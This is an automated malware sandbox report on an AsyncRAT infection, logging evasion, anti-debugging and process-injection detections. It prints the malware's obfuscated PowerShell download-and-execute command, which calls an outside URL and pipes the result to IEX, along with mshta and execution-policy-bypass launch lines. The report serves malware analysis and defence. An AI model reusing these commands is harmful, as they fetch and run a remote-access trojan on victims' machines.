Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Yara detected AsyncRAT
Source: Yara match File source: 27.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001B.00000002.886169058.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.888448368.0000000003161000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 5644, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: RegAsm.exe, 0000001B.00000002.886169058.0000000000402000.00000040.00000001.sdmp Binary or memory string: SBIEDLL.DLL
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6800 Thread sleep time: -10145709240540247s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7144 Thread sleep count: 5308 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7140 Thread sleep count: 3288 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5956 Thread sleep time: -7378697629483816s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6344 Thread sleep count: 2744 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6336 Thread sleep count: 687 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6576 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6284 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3272 Thread sleep time: -19369081277395017s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5996 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1724 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2680 Thread sleep count: 3027 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2680 Thread sleep count: 6385 > 30
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vfl4qio1\vfl4qio1.dll Jump to dropped file
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3322 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6077 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5308 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3288 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2744
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 687
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3441
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5943
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 3027
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 6385
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File Volume queried: C:\ FullSizeInformation
Source: RegAsm.exe, 0000001B.00000002.886169058.0000000000402000.00000040.00000001.sdmp Binary or memory string: vmware
Source: wscript.exe, 00000000.00000002.361896180.0000025E2AACA000.00000004.00000020.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}K
Source: RegAsm.exe, 0000001B.00000003.496362312.0000000005663000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWs
Source: powershell.exe, 00000002.00000002.455319022.000001F46A687000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlllt.he
Source: RegAsm.exe, 0000001B.00000003.505247558.0000000005671000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000011.00000002.475746881.000001CBC2723000.00000004.00000020.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\M8"

Anti Debugging:

barindex
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

barindex
Yara detected Powershell download and execute
Source: Yara match File source: amsi64_6616.amsi.csv, type: OTHER
Writes to foreign memory regions
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40E000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 410000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: EE5008
Compiles code for process injection (via .Net compiler)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\vfl4qio1\vfl4qio1.0.cs Jump to dropped file
Bypasses PowerShell execution policy
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass C:\Users\Public\Music\run.ps1
Injects a PE file into a foreign processes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -Command $CsharpCompiler = New-Object Microsoft.CSharp.CSharpCodeProvider($dictionary);$CompilerParametres = New-Object System.CodeDom.Compiler.CompilerParameters;$CompilerParametres.ReferencedAssemblies.Add('System.dll');$CompilerParametres.ReferencedAssemblies.Add('System.Management.dll');$CompilerParametres.ReferencedAssemblies.Add('System.Windows.Forms.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.IncludeDebugInformation = $false;$CompilerParametres.GenerateExecutable = $false;$CompilerParametres.GenerateInMemory = $true;$c1='(New-';[System.Threading.Thread]::Sleep(1000);$X1 = '!!!!!!!!!!!! '.Replace('!!!!!!!!!!!!','Object');[System.Threading.Thread]::Sleep(1000);$X2 = 'Net';[System.Threading.Thread]::Sleep(1000);$X3 = '.We';[System.Threading.Thread]::Sleep(1000);$c4='.Downlo';[System.Threading.Thread]::Sleep(1000);$D1 = 'bClient)';[System.Threading.Thread]::Sleep(1000);$c3='adString(''h'+'t'+'t'+'p'+'s:/'+'/c'+'h'+'i'+'lp'+'.i'+'t'+'/7'+'8'+'54'+'6'+'1'+'0'')';[System.Threading.Thread]::Sleep(1000);$alosh = $c1,$X1,$X2,$X3,$D1,$c4,$c3;[System.Threading.Thread]::Sleep(1000);$hcnx = 'I`E`X';[System.Threading.Thread]::Sleep(1000);$zzzzzzzzzzzzzzzzzzzzzzzzzzzzz= $hcnx+($alosh -Join '')|I`E`X
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -Command $CsharpCompiler = New-Object Microsoft.CSharp.CSharpCodeProvider($dictionary);$CompilerParametres = New-Object System.CodeDom.Compiler.CompilerParameters;$CompilerParametres.ReferencedAssemblies.Add('System.dll');$CompilerParametres.ReferencedAssemblies.Add('System.Management.dll');$CompilerParametres.ReferencedAssemblies.Add('System.Windows.Forms.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.IncludeDebugInformation = $false;$CompilerParametres.GenerateExecutable = $false;$CompilerParametres.GenerateInMemory = $true;$c1='(New-';[System.Threading.Thread]::Sleep(1000);$X1 = '!!!!!!!!!!!! '.Replace('!!!!!!!!!!!!','Object');[System.Threading.Thread]::Sleep(1000);$X2 = 'Net';[System.Threading.Thread]::Sleep(1000);$X3 = '.We';[System.Threading.Thread]::Sleep(1000);$c4='.Downlo';[System.Threading.Thread]::Sleep(1000);$D1 = 'bClient)';[System.Threading.Thread]::Sleep(1000);$c3='adString(''h'+'t'+'t'+'p'+'s:/'+'/c'+'h'+'i'+'lp'+'.i'+'t'+'/7'+'8'+'54'+'6'+'1'+'0'')';[System.Threading.Thread]::Sleep(1000);$alosh = $c1,$X1,$X2,$X3,$D1,$c4,$c3;[System.Threading.Thread]::Sleep(1000);$hcnx = 'I`E`X';[System.Threading.Thread]::Sleep(1000);$zzzzzzzzzzzzzzzzzzzzzzzzzzzzz= $hcnx+($alosh -Join '')|I`E`X Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -Command $CsharpCompiler = New-Object Microsoft.CSharp.CSharpCodeProvider($dictionary);$CompilerParametres = New-Object System.CodeDom.Compiler.CompilerParameters;$CompilerParametres.ReferencedAssemblies.Add('System.dll');$CompilerParametres.ReferencedAssemblies.Add('System.Management.dll');$CompilerParametres.ReferencedAssemblies.Add('System.Windows.Forms.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.IncludeDebugInformation = $false;$CompilerParametres.GenerateExecutable = $false;$CompilerParametres.GenerateInMemory = $true;$c1='(New-';[System.Threading.Thread]::Sleep(1000);$X1 = '!!!!!!!!!!!! '.Replace('!!!!!!!!!!!!','Object');[System.Threading.Thread]::Sleep(1000);$X2 = 'Net';[System.Threading.Thread]::Sleep(1000);$X3 = '.We';[System.Threading.Thread]::Sleep(1000);$c4='.Downlo';[System.Threading.Thread]::Sleep(1000);$D1 = 'bClient)';[System.Threading.Thread]::Sleep(1000);$c3='adString(''h'+'t'+'t'+'p'+'s:/'+'/c'+'h'+'i'+'lp'+'.i'+'t'+'/7'+'8'+'54'+'6'+'1'+'0'')';[System.Threading.Thread]::Sleep(1000);$alosh = $c1,$X1,$X2,$X3,$D1,$c4,$c3;[System.Threading.Thread]::Sleep(1000);$hcnx = 'I`E`X';[System.Threading.Thread]::Sleep(1000);$zzzzzzzzzzzzzzzzzzzzzzzzzzzzz= $hcnx+($alosh -Join '')|I`E`X Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c powershell.exe -ExecutionPolicy Bypass C:\Users\Public\Music\run.ps1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\ProgramData\ServiceState\WindowsStateRepositoryCore.vbs' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass C:\Users\Public\Music\run.ps1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\Public\Music\vb.vbs' Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Music\vb.bat' ' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass C:\Users\Public\Music\alosh.ps1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\WindowsStateRepositoryCore.bat' '
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta vbscript:Execute('CreateObject(''WScript.Shell'').Run ''powershell -ExecutionPolicy Bypass & 'C'+':'+'\'+'U'+'s'+'e'+'r'+'s'+'\'+'P'+'u'+'b'+'l'+'i'+'c'+'\Service.ps1''', 0:close')
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass & 'C:\Users\Public\Service.ps1'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vfl4qio1\vfl4qio1.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF057.tmp' 'c:\Users\user\AppData\Local\Temp\vfl4qio1\CSC646E655CB52D4766BD87DD83F0456ED1.TMP'
Source: RegAsm.exe, 0000001B.00000003.517646079.0000000005626000.00000004.00000001.sdmp Binary or memory string: Program Manager
Source: RegAsm.exe, 0000001B.00000002.888098861.0000000001880000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: RegAsm.exe, 0000001B.00000002.888098861.0000000001880000.00000002.00020000.sdmp Binary or memory string: Progman
Source: RegAsm.exe, 0000001B.00000002.888098861.0000000001880000.00000002.00020000.sdmp Binary or memory string: &Program Manager
Source: RegAsm.exe, 0000001B.00000002.888098861.0000000001880000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
